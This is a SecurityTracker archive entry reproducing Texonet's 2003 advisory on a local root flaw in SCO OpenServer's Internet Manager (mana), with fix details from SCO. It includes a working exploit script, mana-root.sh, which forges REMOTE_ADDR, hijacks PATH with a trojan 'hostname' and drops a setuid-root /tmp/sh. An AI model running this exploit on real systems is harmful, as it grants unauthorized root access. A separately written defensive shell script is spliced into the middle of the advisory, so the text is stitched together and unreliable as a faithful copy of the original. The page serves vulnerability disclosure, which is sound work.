SecurityTracker.com
SecurityTracker
Archives


 


Category: Application (Generic) > Internet Manager (mana)
Vendor: Santa Cruz Operations
SCO Internet Manager (mana) Environment Variable Validation Flaw Lets Local Users Grab Root Privileges
SecurityTracker Alert ID:  1007703
SecurityTracker URL:  http://securitytracker.com/id/1007703
CVE Reference:   CVE-2003-0742   (Links to External Site)
Updated:  Sep 16 2003
Original Entry Date:  Sep 15 2003
Impact:   Execution of arbitrary code via local system, Root access via local system
Fix Available: Yes
Vendor Confirmed: Yes
Exploit Included: Yes

Description:   A vulnerability was reported in the Internet Manager (mana) application for SCO UNIX. A local user can obtain root privileges on the system.

Texonet issued an advisory warning that a local user can set the REMOTE_ADDR environment variable to '127.0.0.1' and then run '/usr/internet/admin/mana/mana' directly, causing the application to execute the 'menu.mana' file as though the request had arrived through the password-protected web interface, without requiring authentication.

The advisory also indicates that setting PATH_INFO to '/pass-err.mana' and PATH to './:$PATH' causes mana to execute the './hostname' file with root privileges: 'pass-err.mana' runs the bare command name 'hostname' via Tcl 'exec', and that name is resolved through the caller-supplied PATH.

A demonstration exploit is provided in the Source Message.

Impact:   A local user can cause 'mana' to execute arbitrary code with root level privileges.
Solution:   According to the report, the following vendor-supplied package fixes the flaw:

ftp://ftp.sco.com/pub/updates/OpenServer/CSSA-2003-SCO.19

Vendor URL:  www.sco.com/ (Links to External Site)
Cause:   Authentication error, Input validation error
Underlying OS:  UNIX (Open UNIX-SCO)
Underlying OS Comments:  5.0.5 - 5.0.7

Message History:   This archive entry has one or more follow-up message(s) listed below.
Sep 16 2003 (Vendor Issues Fix) Re: SCO Internet Manager (mana) Environment Variable Validation Flaw Lets Local Users Grab Root Privileges
SCO has issued a fix.



 Source Message Contents

Subject:  [Full-Disclosure] SCO internet manager local root.


-----------------------------------------------------------------------
Texonet Security Advisory 20030902
-----------------------------------------------------------------------
Advisory ID    : TEXONET-20030902
Authors        : Joel Soderberg and Christer Oberg
Issue date     : Tuesday, September 02, 2003
Publish date   : Monday, September 15, 2003
Application    : SCO OpenServer / Internet Manager (mana)
Version(s)     : 5.0.5 - 5.0.7
Platforms      : OpenServer
Availability   : http://www.texonet.com/advisories/TEXONET-20030902.txt
-----------------------------------------------------------------------


Problem:
-----------------------------------------------------------------------
A vulnerability in the SCO Internet Manager (mana) program for OpenServer
(SCO Unix) lets local users gain root privileges.


Description:
-----------------------------------------------------------------------
Short description from SCO: "SCO Internet Manager - allowing users to
easily configure and manage Internet and intranet servers."

The SCO Internet Manager (mana) is designed to be run via ncsa_httpd on
port 615, where it is password protected.

Running /usr/internet/admin/mana/mana directly from a local shell is,
however, possible.

By exporting the environment variable REMOTE_ADDR set to 127.0.0.1, mana
is tricked into executing the file menu.mana as if it had been run from
the password-protected area of ncsa_httpd.

Another interesting environment variable is PATH_INFO, which tells mana
which .mana file should be run.

The file pass-err.mana contains the following lines:

  <TCL>
  if {[catch {exec hostname} hostName] != 0} {
      set hostName localhost
  }
  set mana(localHostName) $hostName
  return {}
  </TCL>

This tells us that mana will execute "hostname" when this file is run.

Setting the environment variable PATH_INFO to /pass-err.mana and PATH to
./:$PATH therefore makes mana execute ./hostname with root privileges,
because the bare command name is looked up through the caller's PATH.


Example (Simple POC):

This proof of concept for OpenServer 5.0.7 should give any local user
euid=0(root).


$ uname -a
SCO_SV openserv 3.2 5.0.7 i386
$ id
uid=200(test) gid=50(group) groups=50(group)
$ sh mana-root.sh
# id
uid=200(test) gid=50(group) euid=0(root) groups=50(group)


- Code Start -
mana-root.sh
----------------------------C-U-T---H-E-R-E----------------------------
#!/bin/sh
#
# OpenServer 5.0.7 - Local mana root shell
#
# Pretend the request came through the password-protected httpd area,
# select pass-err.mana (which runs "hostname"), and put the current
# directory first in PATH so the bare name "hostname" resolves to our file.

REMOTE_ADDR=127.0.0.1
PATH_INFO=/pass-err.mana
PATH=./:$PATH

export REMOTE_ADDR
export PATH_INFO
export PATH

# Our "hostname": when mana runs it as root it drops a setuid-root shell.
echo "cp /bin/sh /tmp;chmod 4777 /tmp/sh;" > hostname

chmod 755 hostname

# Run mana; its output does not matter, only the side effect does.
/usr/internet/admin/mana/mana > /dev/null

# Start the setuid-root copy: euid=0.
/tmp/sh

----------------------------C-U-T---H-E-R-E----------------------------
- Code End -
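The two weaknesses the advisory and the proof of concept above rely on, modelled in POSIX sh as an added example (this is not code from the Texonet advisory, from SCO, or from mana itself; every file and directory name in it is invented for the demonstration): a bare-name lookup that honours the caller's PATH next to the same lookup from a sanitized PATH, and a permission check that flags a setuid-root helper any local user may execute, which is the precondition that makes the forged REMOTE_ADDR matter at all.

```shell
#!/bin/sh
# Added example; not code from the Texonet advisory or from SCO's mana.
# Models, in a scratch directory, the two mistakes the advisory describes
# and a fix or check for each. Every file name and path below is invented
# for the demonstration.
#   1. pass-err.mana runs the bare name "hostname" through Tcl exec, so the
#      caller's PATH decides which file runs (the PATH=./:$PATH trick).
#   2. mana runs with root privileges yet is executable from any local
#      shell, so REMOTE_ADDR=127.0.0.1 is an "authentication" that any
#      caller can forge by exporting a variable.

SCRATCH=$(mktemp -d) || exit 1
trap 'rm -rf "$SCRATCH"' EXIT

# Plant a trojan "hostname" the way mana-root.sh does, but harmless: it
# only prints a marker so we can tell whether the lookup picked it up.
cat > "$SCRATCH/hostname" <<'EOF'
#!/bin/sh
echo TROJAN
EOF
chmod 755 "$SCRATCH/hostname"

# Mistake 1: resolve a bare command name through an attacker-supplied PATH,
# with the same "localhost" fallback as pass-err.mana. Prints TROJAN.
vulnerable_hostname() {
    (
        cd "$SCRATCH" || exit 1
        PATH="./:$PATH"; export PATH
        hash -r 2>/dev/null
        hostname 2>/dev/null || echo localhost
    )
}

# Fix 1: drop every PATH entry that is not absolute before any lookup.
# Empty entries (":" at either end, or "::") are dropped too, since they
# also mean "current directory". Prints the cleaned, colon-separated list.
sanitize_path() {
    _old_ifs=$IFS
    IFS=':'
    set -f                      # no globbing while splitting on ':'
    _out=''
    for _dir in $1; do
        case $_dir in
            /*) _out="${_out:+$_out:}$_dir" ;;
        esac
    done
    set +f
    IFS=$_old_ifs
    printf '%s\n' "$_out"
}

# Same lookup as above, but from a sanitized PATH: the planted ./hostname
# is never a candidate, so this prints the real host name (or "localhost"
# when no hostname binary exists on the system), never TROJAN.
hardened_hostname() {
    (
        cd "$SCRATCH" || exit 1
        PATH=$(sanitize_path "./:$PATH"); export PATH
        hash -r 2>/dev/null
        hostname 2>/dev/null || echo localhost
    )
}

# Mistake 2 / check 2: a setuid-root helper that "other" may execute is
# reachable from any local shell, which is what lets the forged REMOTE_ADDR
# reach mana in the first place. Returns 0 when the file is both setuid
# and other-executable, judged from the mode column of ls -ld.
setuid_world_exec() {
    _mode=$(ls -ld "$1" | cut -c1-10)
    case $_mode in
        -??s?????x) return 0 ;;
    esac
    return 1
}

# Two stand-ins for the mana binary (invented names): a world-executable
# setuid mode (4755) and one the httpd group can still run but local
# users cannot (4750).
: > "$SCRATCH/mana_4755"; chmod 4755 "$SCRATCH/mana_4755"
: > "$SCRATCH/mana_4750"; chmod 4750 "$SCRATCH/mana_4750"

printf 'lookup via ./:$PATH ran: %s\n' "$(vulnerable_hostname)"
printf 'lookup via sanitized PATH ran: %s\n' "$(hardened_hostname)"
for _f in "$SCRATCH/mana_4755" "$SCRATCH/mana_4750"; do
    if setuid_world_exec "$_f"; then
        printf '%s: setuid and executable by everyone\n' "$_f"
    else
        printf '%s: setuid but not executable by others\n' "$_f"
    fi
done
```

Run it as an ordinary user; it needs only a writable temporary directory and cleans up after itself. The first two lines of output show the same `hostname` call picking up the planted file once PATH starts with `./` and ignoring it once the relative entry is stripped. On a live system the condition `setuid_world_exec` tests is the one `find / -type f -perm -4001` reports with GNU or BSD find (SCO's own find syntax may differ), and it is the audit worth running on any host that installs privileged CGI helpers.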


Workaround:
-----------------------------------------------------------------------
The proper solution is to install the latest packages.

Location of Fixed Binaries

ftp://ftp.sco.com/pub/updates/OpenServer/CSSA-2003-SCO.19


Verification

MD5 (VOL.000.000) = 37b55df2c9000c703a22baafbe9cef42

md5 is available for download from ftp://ftp.sco.com/pub/security/tools


Installing Fixed Binaries

Upgrade the affected binaries with the following sequence:

1) Download the VOL* files to the /tmp directory

2) Run the custom command, specify an install from media images, and
   specify the /tmp directory as the location of the images.


Disclosure Timeline:
-----------------------------------------------------------------------
9/02/2003: Vendor notified by e-mail
9/03/2003: Vendor has verified the issue and is working on the solution
9/15/2003: Public release


About Texonet:
-----------------------------------------------------------------------
Texonet is a Swedish based security company with a focus on penetration
testing / security assessments, research and development.


Contacting Texonet:
-----------------------------------------------------------------------
E-mail:    advisories(-at-)texonet.com
Homepage:  http://www.texonet.com/
Phone:     +46-8-55174611


Copyright 2020, SecurityGlobal.net LLC